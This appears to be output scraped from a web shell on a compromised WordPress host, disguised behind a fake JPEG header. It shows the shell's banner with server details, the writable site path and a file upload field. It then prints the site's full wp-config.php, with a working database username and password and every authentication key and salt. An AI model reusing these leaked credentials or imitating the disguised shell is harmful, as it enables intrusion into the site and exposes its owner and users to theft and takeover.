���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.177 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/sharktankamerica.com/public_html/newclientweb/ |
Upload File : |
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'u479334040_newclientweb78' ); /** Database username */ define( 'DB_USER', 'u479334040_user21' ); /** Database password */ define( 'DB_PASSWORD', 'q+NJ6ARDQG3C' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'E,6V/A@VnA@RB@sors-k%%RLSC[tH%Wz0E39E5P+#9gW->g0hHK?.S=!qY,/5PVj' ); define( 'SECURE_AUTH_KEY', ' <?xw=73J@f<f^+<[Etu#wW%B5@)l-O:6$wdWFE>$wQ7?RI6A[1SS;HPz%bhOfOu' ); define( 'LOGGED_IN_KEY', 'I+#FN!vU/Eg@7W<US(N=%#*QAPA?./|2<0;2N_`XgC^Hns^1;NKWRSmkcJ!)x_{_' ); define( 'NONCE_KEY', '!~&/4`# ($(gm.,Q<C[hC9r#)m&8@sF<b>Z}@p{QA?G1ZqccNtik0Kv9*lQiK*ed' ); define( 'AUTH_SALT', 'Sm(Drvp9-#?|cO4]W(ygkdT:LLhd)b364wHBLl:|UA:q~6@p$JRn(Ax4!8FyBvU~' ); define( 'SECURE_AUTH_SALT', '>d+@6?v9)Pg<%%nv<1,}fo86{#h<A|`Liyd?jH{R?yEJ`]W7KOrpFHr>8<O6p2Bi' ); define( 'LOGGED_IN_SALT', '1t!,&vN9a3/?&t8-)|dfMM%CNMm,%b<KI]6<D?bm[Obg%*~-j&:[H/=f1pT6NV#W' ); define( 'NONCE_SALT', 'rUwu<6Qm-1 (}@~]UG &87:D:b2%s[Ank`QjW9)^Y<3P>$=$5wBBoPi8~ngUpy79' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'FS_METHOD', 'direct' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';